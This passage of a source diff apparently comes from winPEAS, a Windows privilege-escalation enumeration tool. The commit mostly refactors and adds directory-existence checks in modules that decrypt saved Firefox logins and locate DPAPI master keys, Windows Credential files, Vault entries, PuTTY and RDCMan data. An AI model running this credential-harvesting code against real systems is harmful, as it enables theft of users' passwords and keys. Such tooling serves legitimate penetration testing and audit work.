+                    int limit = 50;
+                    Beaprint.MainPrint($"Firefox history -- limit {limit}\n");
+                    Beaprint.ListPrint(history.Take(limit).ToList());
                 }
                 else
                 {
@@ -101,7 +106,7 @@ namespace winPEAS.KnownFileCreds.Browsers.Firefox
                         if (!(dir.EndsWith("Public") || dir.EndsWith("Default") || dir.EndsWith("Default User") || dir.EndsWith("All Users")))
                         {
                             string userFirefoxBasePath = $"{dir}\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\";
-                            if (System.IO.Directory.Exists(userFirefoxBasePath))
+                            if (Directory.Exists(userFirefoxBasePath))
                             {
                                 var directories = Directory.EnumerateDirectories(userFirefoxBasePath);
                                 foreach (string directory in directories)
@@ -248,6 +253,8 @@ namespace winPEAS.KnownFileCreds.Browsers.Firefox
                 }
 
                 foreach (string dir in dirs)
+                {
+                    if (Directory.Exists(dir))
                     {
                         string[] files = Directory.EnumerateFiles(dir, "signons.sqlite").ToArray();
                         if (files.Length > 0)
@@ -269,6 +276,7 @@ namespace winPEAS.KnownFileCreds.Browsers.Firefox
                             FFDecryptor.NSS_Init(dir);
                             break;
                         }
+                    }
 
                 }
 
@@ -313,8 +321,8 @@ namespace winPEAS.KnownFileCreds.Browsers.Firefox
 
                     foreach (Browsers.Firefox.LoginData loginData in ffLoginData.logins)
                     {
-                        string username = Browsers.Firefox.FFDecryptor.Decrypt(loginData.encryptedUsername);
+                        string username = FFDecryptor.Decrypt(loginData.encryptedUsername);
-                        string password = Browsers.Firefox.FFDecryptor.Decrypt(loginData.encryptedPassword);
+                        string password = FFDecryptor.Decrypt(loginData.encryptedPassword);
                         logins.Add(new CredentialModel
                         {
                             Username = username,

winPEAS/winPEASexe/winPEAS/KnownFileCreds/Browsers/InternetExplorer.cs

@@ -1,11 +1,11 @@
-using System;
+using Microsoft.Win32;
+using System;
 using System.Collections.Generic;
 using System.IO;
 using System.Linq;
 using System.Reflection;
 using System.Runtime.InteropServices;
 using System.Text.RegularExpressions;
-using Microsoft.Win32;
 using winPEAS.Checks;
 using winPEAS.Helpers;
 using winPEAS.Helpers.Registry;
@@ -30,7 +30,7 @@ namespace winPEAS.KnownFileCreds.Browsers
             {
                 Beaprint.MainPrint("Current IE tabs");
                 Beaprint.LinkPrint("https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#browsers-history");
-                List<string> urls = InternetExplorer.GetCurrentIETabs();
+                List<string> urls = GetCurrentIETabs();
 
                 Dictionary<string, string> colorsB = new Dictionary<string, string>()
                 {
@@ -51,9 +51,9 @@ namespace winPEAS.KnownFileCreds.Browsers
             {
                 Beaprint.MainPrint("Looking for GET credentials in IE history");
                 Beaprint.LinkPrint("https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#browsers-history");
-                Dictionary<string, List<string>> chromeHistBook = InternetExplorer.GetIEHistFav();
+                Dictionary<string, List<string>> ieHistoryBook = GetIEHistFav();
-                List<string> history = chromeHistBook["history"];
+                List<string> history = ieHistoryBook["history"];
-                List<string> favorites = chromeHistBook["favorites"];
+                List<string> favorites = ieHistoryBook["favorites"];
 
                 if (history.Count > 0)
                 {
@@ -69,8 +69,15 @@ namespace winPEAS.KnownFileCreds.Browsers
                             Beaprint.AnsiPrint("    " + url, colorsB);
                         }
                     }
-
                     Console.WriteLine();
+
+                    int limit = 50;
+                    Beaprint.MainPrint($"IE history -- limit {limit}\n");
+                    Beaprint.ListPrint(history.Take(limit).ToList());
+                }
+                else
+                {
+                    Beaprint.NotFoundPrint();
                 }
 
                 Beaprint.MainPrint("IE favorites");
@@ -91,7 +98,7 @@ namespace winPEAS.KnownFileCreds.Browsers
                 { "favorites", new List<string>() },
             };
 
-            DateTime startTime = System.DateTime.Now.AddDays(-lastDays);
+            DateTime startTime = DateTime.Now.AddDays(-lastDays);
 
             try
             {
@@ -166,24 +173,15 @@ namespace winPEAS.KnownFileCreds.Browsers
                     if ((settings != null) && (settings.Count != 0))
                     {
                         foreach (KeyValuePair<string, object> kvp in settings)
-                        {
-                            byte[] timeBytes = RegistryHelper.GetRegValueBytes("HKCU", "SOFTWARE\\Microsoft\\Internet Explorer\\TypedURLsTime", kvp.Key.ToString().Trim());
-                            if (timeBytes != null)
-                            {
-                                long timeLong = (long)(BitConverter.ToInt64(timeBytes, 0));
-                                DateTime urlTime = DateTime.FromFileTime(timeLong);
-                                if (urlTime > startTime)
                         {
                             results["history"].Add(kvp.Value.ToString().Trim());
                         }
                     }
-                        }
-                    }
-
-                    string userIEBookmarkPath = string.Format("{0}\\Favorites\\", System.Environment.GetEnvironmentVariable("USERPROFILE"));
 
+                    string userIEBookmarkPath = string.Format("{0}\\Favorites\\", Environment.GetEnvironmentVariable("USERPROFILE"));
+                    if (Directory.Exists(userIEBookmarkPath))
+                    {
                         string[] bookmarkPaths = Directory.EnumerateFiles(userIEBookmarkPath, "*.url", SearchOption.AllDirectories).ToArray();
-
                         foreach (string bookmarkPath in bookmarkPaths)
                         {
                             using (StreamReader rdr = new StreamReader(bookmarkPath))
@@ -204,6 +202,7 @@ namespace winPEAS.KnownFileCreds.Browsers
                         }
                     }
                 }
+            }
             catch (Exception ex)
             {
                 Beaprint.GrayPrint(string.Format("  [X] Exception: {0}", ex));

winPEAS/winPEASexe/winPEAS/KnownFileCreds/KnownFileCredsInfo.cs

@@ -1,4 +1,5 @@
-using System;
+using Microsoft.Win32;
+using System;
 using System.Collections.Generic;
 using System.IO;
 using System.Linq;
@@ -6,7 +7,6 @@ using System.Reflection;
 using System.Runtime.InteropServices;
 using System.Text;
 using System.Text.RegularExpressions;
-using Microsoft.Win32;
 using winPEAS.Helpers;
 using winPEAS.Helpers.Registry;
 
@@ -123,7 +123,7 @@ namespace winPEAS.KnownFileCreds
             // parses recent file shortcuts via COM
             List<Dictionary<string, string>> results = new List<Dictionary<string, string>>();
             int lastDays = 7;
-            DateTime startTime = System.DateTime.Now.AddDays(-lastDays);
+            DateTime startTime = DateTime.Now.AddDays(-lastDays);
 
             try
             {
@@ -144,6 +144,8 @@ namespace winPEAS.KnownFileCreds
                         {
                             string recentPath = string.Format("{0}\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\", dir);
                             try
+                            {
+                                if (Directory.Exists(recentPath))
                                 {
                                     string[] recentFiles = Directory.EnumerateFiles(recentPath, "*.lnk", SearchOption.AllDirectories).ToArray();
 
@@ -152,7 +154,7 @@ namespace winPEAS.KnownFileCreds
                                         Console.WriteLine("   {0} :\r\n", userName);
                                         foreach (string recentFile in recentFiles)
                                         {
-                                        DateTime lastAccessed = System.IO.File.GetLastAccessTime(recentFile);
+                                            DateTime lastAccessed = File.GetLastAccessTime(recentFile);
 
                                             if (lastAccessed > startTime)
                                             {
@@ -174,14 +176,16 @@ namespace winPEAS.KnownFileCreds
                                         }
                                     }
                                 }
+                            }
                             catch { }
                         }
                     }
                 }
                 else
                 {
-                    string recentPath = string.Format("{0}\\Microsoft\\Windows\\Recent\\", System.Environment.GetEnvironmentVariable("APPDATA"));
+                    string recentPath = string.Format("{0}\\Microsoft\\Windows\\Recent\\", Environment.GetEnvironmentVariable("APPDATA"));
-
+                    if (Directory.Exists(recentPath))
+                    {
                         var recentFiles = Directory.EnumerateFiles(recentPath, "*.lnk", SearchOption.AllDirectories);
 
                         foreach (string recentFile in recentFiles)
@@ -190,7 +194,7 @@ namespace winPEAS.KnownFileCreds
                             //WshShell shell = new WshShell();
                             //IWshShortcut shortcut = (IWshShortcut)shell.CreateShortcut(recentFile);
 
-                        DateTime lastAccessed = System.IO.File.GetLastAccessTime(recentFile);
+                            DateTime lastAccessed = File.GetLastAccessTime(recentFile);
 
                             if (lastAccessed > startTime)
                             {
@@ -210,6 +214,7 @@ namespace winPEAS.KnownFileCreds
                             }
                         }
                     }
+                }
                 // release the WshShell COM object
                 Marshal.ReleaseComObject(shellObj);
                 shellObj = null;
@@ -237,13 +242,15 @@ namespace winPEAS.KnownFileCreds
                         string userName = parts[parts.Length - 1];
                         if (!(dir.EndsWith("Public") || dir.EndsWith("Default") || dir.EndsWith("Default User") || dir.EndsWith("All Users")))
                         {
-                            List<string> userDPAPIBasePaths = new List<string>();
+                            List<string> userDPAPIBasePaths = new List<string>
-                            userDPAPIBasePaths.Add(string.Format("{0}\\AppData\\Roaming\\Microsoft\\Protect\\", System.Environment.GetEnvironmentVariable("USERPROFILE")));
+                            {
-                            userDPAPIBasePaths.Add(string.Format("{0}\\AppData\\Local\\Microsoft\\Protect\\", System.Environment.GetEnvironmentVariable("USERPROFILE")));
+                                string.Format("{0}\\AppData\\Roaming\\Microsoft\\Protect\\", Environment.GetEnvironmentVariable("USERPROFILE")),
+                                string.Format("{0}\\AppData\\Local\\Microsoft\\Protect\\", Environment.GetEnvironmentVariable("USERPROFILE"))
+                            };
 
                             foreach (string userDPAPIBasePath in userDPAPIBasePaths)
                             {
-                                if (System.IO.Directory.Exists(userDPAPIBasePath))
+                                if (Directory.Exists(userDPAPIBasePath))
                                 {
                                     var directories = Directory.EnumerateDirectories(userDPAPIBasePath);
                                     foreach (string directory in directories)
@@ -254,9 +261,9 @@ namespace winPEAS.KnownFileCreds
                                         {
                                             if (Regex.IsMatch(file, @"[0-9A-Fa-f]{8}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{12}"))
                                             {
-                                                DateTime lastAccessed = System.IO.File.GetLastAccessTime(file);
+                                                DateTime lastAccessed = File.GetLastAccessTime(file);
-                                                DateTime lastModified = System.IO.File.GetLastWriteTime(file);
+                                                DateTime lastModified = File.GetLastWriteTime(file);
-                                                string fileName = System.IO.Path.GetFileName(file);
+                                                string fileName = Path.GetFileName(file);
                                                 results.Add(new Dictionary<string, string>()
                                                 {
                                                     { "MasterKey", file },
@@ -274,13 +281,15 @@ namespace winPEAS.KnownFileCreds
                 else
                 {
                     string userName = Environment.GetEnvironmentVariable("USERNAME");
-                    List<string> userDPAPIBasePaths = new List<string>();
+                    List<string> userDPAPIBasePaths = new List<string>
-                    userDPAPIBasePaths.Add(string.Format("{0}\\AppData\\Roaming\\Microsoft\\Protect\\", System.Environment.GetEnvironmentVariable("USERPROFILE")));
+                    {
-                    userDPAPIBasePaths.Add(string.Format("{0}\\AppData\\Local\\Microsoft\\Protect\\", System.Environment.GetEnvironmentVariable("USERPROFILE")));
+                        string.Format("{0}\\AppData\\Roaming\\Microsoft\\Protect\\", Environment.GetEnvironmentVariable("USERPROFILE")),
+                        string.Format("{0}\\AppData\\Local\\Microsoft\\Protect\\", Environment.GetEnvironmentVariable("USERPROFILE"))
+                    };
 
                     foreach (string userDPAPIBasePath in userDPAPIBasePaths)
                     {
-                        if (System.IO.Directory.Exists(userDPAPIBasePath))
+                        if (Directory.Exists(userDPAPIBasePath))
                         {
                             var directories = Directory.EnumerateDirectories(userDPAPIBasePath);
                             foreach (string directory in directories)
@@ -291,9 +300,9 @@ namespace winPEAS.KnownFileCreds
                                 {
                                     if (Regex.IsMatch(file, @"[0-9A-Fa-f]{8}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{12}"))
                                     {
-                                        DateTime lastAccessed = System.IO.File.GetLastAccessTime(file);
+                                        DateTime lastAccessed = File.GetLastAccessTime(file);
-                                        DateTime lastModified = System.IO.File.GetLastWriteTime(file);
+                                        DateTime lastModified = File.GetLastWriteTime(file);
-                                        string fileName = System.IO.Path.GetFileName(file);
+                                        string fileName = Path.GetFileName(file);
                                         results.Add(new Dictionary<string, string>()
                                     {
                                         { "MasterKey", file },
@@ -331,23 +340,25 @@ namespace winPEAS.KnownFileCreds
                         string userName = parts[parts.Length - 1];
                         if (!(dir.EndsWith("Public") || dir.EndsWith("Default") || dir.EndsWith("Default User") || dir.EndsWith("All Users")))
                         {
-                            List<string> userCredFilePaths = new List<string>();
+                            List<string> userCredFilePaths = new List<string>
-                            userCredFilePaths.Add(string.Format("{0}\\AppData\\Local\\Microsoft\\Credentials\\", dir));
+                            {
-                            userCredFilePaths.Add(string.Format("{0}\\AppData\\Roaming\\Microsoft\\Credentials\\", dir));
+                                string.Format("{0}\\AppData\\Local\\Microsoft\\Credentials\\", dir),
+                                string.Format("{0}\\AppData\\Roaming\\Microsoft\\Credentials\\", dir)
+                            };
 
                             foreach (string userCredFilePath in userCredFilePaths)
                             {
-                                if (System.IO.Directory.Exists(userCredFilePath))
+                                if (Directory.Exists(userCredFilePath))
                                 {
                                     var systemFiles = Directory.EnumerateFiles(userCredFilePath);
                                     if ((systemFiles != null))
                                     {
                                         foreach (string file in systemFiles)
                                         {
-                                            DateTime lastAccessed = System.IO.File.GetLastAccessTime(file);
+                                            DateTime lastAccessed = File.GetLastAccessTime(file);
-                                            DateTime lastModified = System.IO.File.GetLastWriteTime(file);
+                                            DateTime lastModified = File.GetLastWriteTime(file);
-                                            long size = new System.IO.FileInfo(file).Length;
+                                            long size = new FileInfo(file).Length;
-                                            string fileName = System.IO.Path.GetFileName(file);
+                                            string fileName = Path.GetFileName(file);
 
                                             // jankily parse the bytes to extract the credential type and master key GUID
                                             // reference- https://github.com/gentilkiwi/mimikatz/blob/3d8be22fff9f7222f9590aa007629e18300cf643/modules/kull_m_dpapi.h#L24-L54
@@ -381,15 +392,17 @@ namespace winPEAS.KnownFileCreds
                     }
 
                     string systemFolder = string.Format("{0}\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Credentials", Environment.GetEnvironmentVariable("SystemRoot"));
+                    if (Directory.Exists(systemFolder))
+                    {
                         var files = Directory.EnumerateFiles(systemFolder);
                         if ((files != null))
                         {
                             foreach (string file in files)
                             {
-                            DateTime lastAccessed = System.IO.File.GetLastAccessTime(file);
+                                DateTime lastAccessed = File.GetLastAccessTime(file);
-                            DateTime lastModified = System.IO.File.GetLastWriteTime(file);
+                                DateTime lastModified = File.GetLastWriteTime(file);
                                 long size = new System.IO.FileInfo(file).Length;
-                            string fileName = System.IO.Path.GetFileName(file);
+                                string fileName = Path.GetFileName(file);
 
                                 // jankily parse the bytes to extract the credential type and master key GUID
                                 // reference- https://github.com/gentilkiwi/mimikatz/blob/3d8be22fff9f7222f9590aa007629e18300cf643/modules/kull_m_dpapi.h#L24-L54
@@ -418,12 +431,15 @@ namespace winPEAS.KnownFileCreds
                             }
                         }
                     }
+                }
                 else
                 {
                     string userName = Environment.GetEnvironmentVariable("USERNAME");
-                    List<string> userCredFilePaths = new List<string>();
+                    List<string> userCredFilePaths = new List<string>
-                    userCredFilePaths.Add(string.Format("{0}\\AppData\\Local\\Microsoft\\Credentials\\", System.Environment.GetEnvironmentVariable("USERPROFILE")));
+                    {
-                    userCredFilePaths.Add(string.Format("{0}\\AppData\\Roaming\\Microsoft\\Credentials\\", System.Environment.GetEnvironmentVariable("USERPROFILE")));
+                        string.Format("{0}\\AppData\\Local\\Microsoft\\Credentials\\", Environment.GetEnvironmentVariable("USERPROFILE")),
+                        string.Format("{0}\\AppData\\Roaming\\Microsoft\\Credentials\\", Environment.GetEnvironmentVariable("USERPROFILE"))
+                    };
 
                     foreach (string userCredFilePath in userCredFilePaths)
                     {
@@ -433,10 +449,10 @@ namespace winPEAS.KnownFileCreds
 
                             foreach (string file in files)
                             {
-                                DateTime lastAccessed = System.IO.File.GetLastAccessTime(file);
+                                DateTime lastAccessed = File.GetLastAccessTime(file);
-                                DateTime lastModified = System.IO.File.GetLastWriteTime(file);
+                                DateTime lastModified = File.GetLastWriteTime(file);
                                 long size = new System.IO.FileInfo(file).Length;
-                                string fileName = System.IO.Path.GetFileName(file);
+                                string fileName = Path.GetFileName(file);
 
                                 // jankily parse the bytes to extract the credential type and master key GUID
                                 // reference- https://github.com/gentilkiwi/mimikatz/blob/3d8be22fff9f7222f9590aa007629e18300cf643/modules/kull_m_dpapi.h#L24-L54

winPEAS/winPEASexe/winPEAS/KnownFileCreds/Putty.cs

@@ -1,6 +1,6 @@
-using System;
+using Microsoft.Win32;
+using System;
 using System.Collections.Generic;
-using Microsoft.Win32;
 using winPEAS.Helpers;
 using winPEAS.Helpers.Registry;
 
@@ -20,7 +20,7 @@ namespace winPEAS.KnownFileCreds
             try
             {
                 Beaprint.MainPrint("Putty Sessions");
-                List<Dictionary<string, string>> putty_sess = Putty.GetPuttySessions();
+                List<Dictionary<string, string>> putty_sess = GetPuttySessions();
 
                 Dictionary<string, string> colorF = new Dictionary<string, string>()
                         {
@@ -39,7 +39,7 @@ namespace winPEAS.KnownFileCreds
             try
             {
                 Beaprint.MainPrint("Putty SSH Host keys");
-                List<Dictionary<string, string>> putty_sess = Putty.ListPuttySSHHostKeys();
+                List<Dictionary<string, string>> putty_sess = ListPuttySSHHostKeys();
                 Dictionary<string, string> colorF = new Dictionary<string, string>()
                         {
                             { ".*", Beaprint.ansi_color_bad },
@@ -182,8 +182,10 @@ namespace winPEAS.KnownFileCreds
                         Dictionary<string, object> hostKeys = RegistryHelper.GetRegValues("HKU", string.Format("{0}\\Software\\SimonTatham\\PuTTY\\SshHostKeys\\", SID));
                         if ((hostKeys != null) && (hostKeys.Count != 0))
                         {
-                            Dictionary<string, string> putty_ssh = new Dictionary<string, string>();
+                            Dictionary<string, string> putty_ssh = new Dictionary<string, string>
-                            putty_ssh["UserSID"] = SID;
+                            {
+                                ["UserSID"] = SID
+                            };
                             foreach (KeyValuePair<string, object> kvp in hostKeys)
                             {
                                 putty_ssh[kvp.Key] = ""; //Looks like only matters the key name, not the value

winPEAS/winPEASexe/winPEAS/KnownFileCreds/RemoteDesktop.cs

@@ -1,8 +1,8 @@
-using System;
+using Microsoft.Win32;
+using System;
 using System.Collections.Generic;
 using System.IO;
 using System.Xml;
-using Microsoft.Win32;
 using winPEAS.Helpers;
 using winPEAS.Helpers.Registry;
 
@@ -77,7 +77,7 @@ namespace winPEAS.KnownFileCreds
                         if (!(dir.EndsWith("Public") || dir.EndsWith("Default") || dir.EndsWith("Default User") || dir.EndsWith("All Users")))
                         {
                             string userRDManFile = string.Format("{0}\\AppData\\Local\\Microsoft\\Remote Desktop Connection Manager\\RDCMan.settings", dir);
-                            if (System.IO.File.Exists(userRDManFile))
+                            if (File.Exists(userRDManFile))
                             {
                                 XmlDocument xmlDoc = new XmlDocument();
                                 xmlDoc.Load(userRDManFile);
@@ -87,8 +87,8 @@ namespace winPEAS.KnownFileCreds
                                 XmlNodeList items = filesToOpen[0].ChildNodes;
                                 XmlNode node = items[0];
 
-                                DateTime lastAccessed = System.IO.File.GetLastAccessTime(userRDManFile);
+                                DateTime lastAccessed = File.GetLastAccessTime(userRDManFile);
-                                DateTime lastModified = System.IO.File.GetLastWriteTime(userRDManFile);
+                                DateTime lastModified = File.GetLastWriteTime(userRDManFile);
                                 Dictionary<string, string> rdg = new Dictionary<string, string>(){
                                     { "RDCManFile", userRDManFile },
                                     { "Accessed", string.Format("{0}", lastAccessed) },
@@ -107,9 +107,9 @@ namespace winPEAS.KnownFileCreds
                 else
                 {
                     string userName = Environment.GetEnvironmentVariable("USERNAME");
-                    string userRDManFile = string.Format("{0}\\AppData\\Local\\Microsoft\\Remote Desktop Connection Manager\\RDCMan.settings", System.Environment.GetEnvironmentVariable("USERPROFILE"));
+                    string userRDManFile = string.Format("{0}\\AppData\\Local\\Microsoft\\Remote Desktop Connection Manager\\RDCMan.settings", Environment.GetEnvironmentVariable("USERPROFILE"));
 
-                    if (System.IO.File.Exists(userRDManFile))
+                    if (File.Exists(userRDManFile))
                     {
                         XmlDocument xmlDoc = new XmlDocument();
                         xmlDoc.Load(userRDManFile);
@@ -119,8 +119,8 @@ namespace winPEAS.KnownFileCreds
                         XmlNodeList items = filesToOpen[0].ChildNodes;
                         XmlNode node = items[0];
 
-                        DateTime lastAccessed = System.IO.File.GetLastAccessTime(userRDManFile);
+                        DateTime lastAccessed = File.GetLastAccessTime(userRDManFile);
-                        DateTime lastModified = System.IO.File.GetLastWriteTime(userRDManFile);
+                        DateTime lastModified = File.GetLastWriteTime(userRDManFile);
                         Dictionary<string, string> rdg = new Dictionary<string, string>(){
                                     { "RDCManFile", userRDManFile },
                                     { "Accessed", string.Format("{0}", lastAccessed) },

winPEAS/winPEASexe/winPEAS/KnownFileCreds/SuperPutty/SuperPutty.cs

@@ -24,6 +24,8 @@ namespace winPEAS.KnownFileCreds.SuperPutty
                 try
                 {
                     var path = $"{dir}\\Documents\\SuperPuTTY\\";
+                    if (Directory.Exists(path))
+                    {
                         var files = Directory.EnumerateFiles(path, filter, SearchOption.TopDirectoryOnly);
 
                         foreach (var file in files)
@@ -31,6 +33,7 @@ namespace winPEAS.KnownFileCreds.SuperPutty
                             Beaprint.BadPrint($"     {file}");
                         }
                     }
+                }
                 catch (Exception)
                 {
                 }

winPEAS/winPEASexe/winPEAS/KnownFileCreds/Vault/VaultCli.cs

@@ -45,16 +45,18 @@ namespace winPEAS.KnownFileCreds.Vault
 
                 // Create dictionary to translate Guids to human readable elements
                 IntPtr guidAddress = vaultGuidPtr;
-                Dictionary<Guid, string> vaultSchema = new Dictionary<Guid, string>();
+                Dictionary<Guid, string> vaultSchema = new Dictionary<Guid, string>
-                vaultSchema.Add(new Guid("2F1A6504-0641-44CF-8BB5-3612D865F2E5"), "Windows Secure Note");
+                {
-                vaultSchema.Add(new Guid("3CCD5499-87A8-4B10-A215-608888DD3B55"), "Windows Web Password Credential");
+                    { new Guid("2F1A6504-0641-44CF-8BB5-3612D865F2E5"), "Windows Secure Note" },
-                vaultSchema.Add(new Guid("154E23D0-C644-4E6F-8CE6-5069272F999F"), "Windows Credential Picker Protector");
+                    { new Guid("3CCD5499-87A8-4B10-A215-608888DD3B55"), "Windows Web Password Credential" },
-                vaultSchema.Add(new Guid("4BF4C442-9B8A-41A0-B380-DD4A704DDB28"), "Web Credentials");
+                    { new Guid("154E23D0-C644-4E6F-8CE6-5069272F999F"), "Windows Credential Picker Protector" },
-                vaultSchema.Add(new Guid("77BC582B-F0A6-4E15-4E80-61736B6F3B29"), "Windows Credentials");
+                    { new Guid("4BF4C442-9B8A-41A0-B380-DD4A704DDB28"), "Web Credentials" },
-                vaultSchema.Add(new Guid("E69D7838-91B5-4FC9-89D5-230D4D4CC2BC"), "Windows Domain Certificate Credential");
+                    { new Guid("77BC582B-F0A6-4E15-4E80-61736B6F3B29"), "Windows Credentials" },
-                vaultSchema.Add(new Guid("3E0E35BE-1B77-43E7-B873-AED901B6275B"), "Windows Domain Password Credential");
+                    { new Guid("E69D7838-91B5-4FC9-89D5-230D4D4CC2BC"), "Windows Domain Certificate Credential" },
-                vaultSchema.Add(new Guid("3C886FF3-2669-4AA2-A8FB-3F6759A77548"), "Windows Extended Credential");
+                    { new Guid("3E0E35BE-1B77-43E7-B873-AED901B6275B"), "Windows Domain Password Credential" },
-                vaultSchema.Add(new Guid("00000000-0000-0000-0000-000000000000"), null);
+                    { new Guid("3C886FF3-2669-4AA2-A8FB-3F6759A77548"), "Windows Extended Credential" },
+                    { new Guid("00000000-0000-0000-0000-000000000000"), null }
+                };
 
                 for (int i = 0; i < vaultCount; i++)
                 {
@@ -167,7 +169,7 @@ namespace winPEAS.KnownFileCreds.Vault
                                     vault_cred["PacakgeSid"] = string.Format("{0}", packageSid);
                                 }
                                 vault_cred["Credential"] = string.Format("{0}", cred);
-                                vault_cred["Last Modified"] = string.Format("{0}", System.DateTime.FromFileTimeUtc((long)lastModified));
+                                vault_cred["Last Modified"] = string.Format("{0}", DateTime.FromFileTimeUtc((long)lastModified));
                                 results.Add(vault_cred);
                             }
                         }

winPEAS/winPEASexe/winPEAS/Native/Classes/SafeTokenHandle.cs

@@ -1,7 +1,6 @@
 using System;
 using System.Runtime.InteropServices;
 using winPEAS.Native.Enums;
-using winPEAS.TaskScheduler.TaskEditor.Native;
 
 namespace winPEAS.Native.Classes
 {

winPEAS/winPEASexe/winPEAS/Native/Ntdll.cs

@@ -1,7 +1,5 @@
 using System;
-using System.Runtime.ConstrainedExecution;
 using System.Runtime.InteropServices;
-using winPEAS.Info.SystemInfo.NamedPipes;
 
 namespace winPEAS.Native
 {

winPEAS/winPEASexe/winPEAS/Properties/AssemblyInfo.cs

@@ -1,5 +1,4 @@
 using System.Reflection;
-using System.Runtime.CompilerServices;
 using System.Runtime.InteropServices;
 
 // General Information about an assembly is controlled through the following

winPEAS/winPEASexe/winPEAS/TaskScheduler/AccessControlExtension.cs

@@ -2,8 +2,6 @@
 using System.Collections.Generic;
 using System.Linq;
 using System.Security.AccessControl;
-using System.Text;
-using System.Threading.Tasks;
 
 namespace winPEAS.TaskScheduler
 {
@@ -20,7 +18,7 @@ namespace winPEAS.TaskScheduler
             var aces = new System.Collections.Generic.List<GenericAce>(acl.Cast<GenericAce>());
 
             // Sort aces based on canonical order
-			aces.Sort((a, b) => System.Collections.Generic.Comparer<byte>.Default.Compare(GetComparisonValue(a), GetComparisonValue(b)));
+            aces.Sort((a, b) => Comparer<byte>.Default.Compare(GetComparisonValue(a), GetComparisonValue(b)));
 
             // Add sorted aces back to ACL
             while (acl.Count > 0) acl.RemoveAce(0);

winPEAS/winPEASexe/winPEAS/TaskScheduler/Action.cs

@@ -1,10 +1,10 @@
-using System;
+using Microsoft.Win32;
+using System;
 using System.Collections.Generic;
 using System.ComponentModel;
 using System.Reflection;
 using System.Runtime.InteropServices;
 using System.Xml.Serialization;
-using Microsoft.Win32;
 using winPEAS.TaskScheduler.V1;
 using winPEAS.TaskScheduler.V2;
 

winPEAS/winPEASexe/winPEAS/TaskScheduler/ActionCollection.cs

@@ -3,11 +3,8 @@ using System.Collections;
 using System.Collections.Generic;
 using System.Collections.Specialized;
 using System.ComponentModel;
-using System.Linq;
 using System.Runtime.CompilerServices;
 using System.Runtime.InteropServices;
-using System.Text;
-using System.Threading.Tasks;
 using System.Xml.Serialization;
 using winPEAS.TaskScheduler.TaskEditor.Native;
 using winPEAS.TaskScheduler.V1;
@@ -706,7 +703,7 @@ namespace winPEAS.TaskScheduler
                         }
                     }
                     else
-						ret.Add(Action.ExecAction.ConvertFromPowerShellAction(exec));
+                        ret.Add(Action.ConvertFromPowerShellAction(exec));
                 }
                 else if (!string.IsNullOrEmpty(exec.Path))
                 {

winPEAS/winPEASexe/winPEAS/TaskScheduler/CultureSwitcher.cs

@@ -1,9 +1,5 @@
 using System;
-using System.Collections.Generic;
-using System.Linq;
-using System.Text;
 using System.Threading;
-using System.Threading.Tasks;
 
 namespace winPEAS.TaskScheduler
 {

winPEAS/winPEASexe/winPEAS/TaskScheduler/EnumUtil.cs

@@ -1,9 +1,6 @@
 using System;
 using System.Collections.Generic;
 using System.ComponentModel;
-using System.Linq;
-using System.Text;
-using System.Threading.Tasks;
 
 namespace winPEAS.TaskScheduler
 {

winPEAS/winPEASexe/winPEAS/TaskScheduler/JetBrains.Annotations.cs

@@ -1,8 +1,4 @@
 using System;
-using System.Collections.Generic;
-using System.Linq;
-using System.Text;
-using System.Threading.Tasks;
 
 namespace winPEAS.TaskScheduler
 {

winPEAS/winPEASexe/winPEAS/TaskScheduler/NamedValueCollection.cs

@@ -2,10 +2,7 @@
 using System.Collections.Generic;
 using System.Collections.Specialized;
 using System.ComponentModel;
-using System.Linq;
 using System.Runtime.InteropServices;
-using System.Text;
-using System.Threading.Tasks;
 using System.Xml.Serialization;
 using winPEAS.TaskScheduler.TaskEditor.Native;
 using winPEAS.TaskScheduler.V2;

winPEAS/winPEASexe/winPEAS/TaskScheduler/NotV1SupportedException.cs

@@ -1,12 +1,8 @@
 using System;
-using System.Collections.Generic;
 using System.Diagnostics;
-using System.Linq;
 using System.Runtime.Serialization;
 using System.Security;
 using System.Security.Permissions;
-using System.Text;
-using System.Threading.Tasks;
 
 namespace winPEAS.TaskScheduler
 {

winPEAS/winPEASexe/winPEAS/TaskScheduler/ReflectionHelper.cs

@@ -1,9 +1,5 @@
 using System;
-using System.Collections.Generic;
-using System.Linq;
 using System.Reflection;
-using System.Text;
-using System.Threading.Tasks;
 
 namespace winPEAS.TaskScheduler
 {

winPEAS/winPEASexe/winPEAS/TaskScheduler/TaskEditor/Native/InteropUtil.cs

@@ -1,10 +1,7 @@
 using System;
 using System.Collections;
 using System.Collections.Generic;
-using System.Linq;
 using System.Runtime.InteropServices;
-using System.Text;
-using System.Threading.Tasks;
 
 namespace winPEAS.TaskScheduler.TaskEditor.Native
 {

winPEAS/winPEASexe/winPEAS/TaskScheduler/TaskEditor/Native/NTDSAPI.cs

@@ -68,7 +68,7 @@ namespace winPEAS.TaskScheduler.TaskEditor.Native
             public string CrackName(string name)
             {
                 var res = CrackNames(new string[] { name });
-				if (res == null || res.Length == 0 || res[0].status != NativeMethods.DS_NAME_ERROR.DS_NAME_NO_ERROR)
+                if (res == null || res.Length == 0 || res[0].status != DS_NAME_ERROR.DS_NAME_NO_ERROR)
                     throw new SecurityException("Unable to resolve user name.");
                 return res[0].pName;
             }

winPEAS/winPEASexe/winPEAS/TaskScheduler/TaskEditor/Native/NetServerEnum.cs

@@ -66,12 +66,12 @@ namespace winPEAS.TaskScheduler.TaskEditor.Native
         public struct NetworkComputerInfo // SERVER_INFO_101
         {
             ServerPlatform sv101_platform_id;
-			[MarshalAs(System.Runtime.InteropServices.UnmanagedType.LPWStr)]
+            [MarshalAs(UnmanagedType.LPWStr)]
             string sv101_name;
             int sv101_version_major;
             int sv101_version_minor;
             ServerTypes sv101_type;
-			[MarshalAs(System.Runtime.InteropServices.UnmanagedType.LPWStr)]
+            [MarshalAs(UnmanagedType.LPWStr)]
             string sv101_comment;
 
             public ServerPlatform Platform => sv101_platform_id;

winPEAS/winPEASexe/winPEAS/TaskScheduler/TaskEvent.cs

@@ -1,9 +1,6 @@
 using System;
 using System.Collections.Generic;
 using System.Diagnostics.Eventing.Reader;
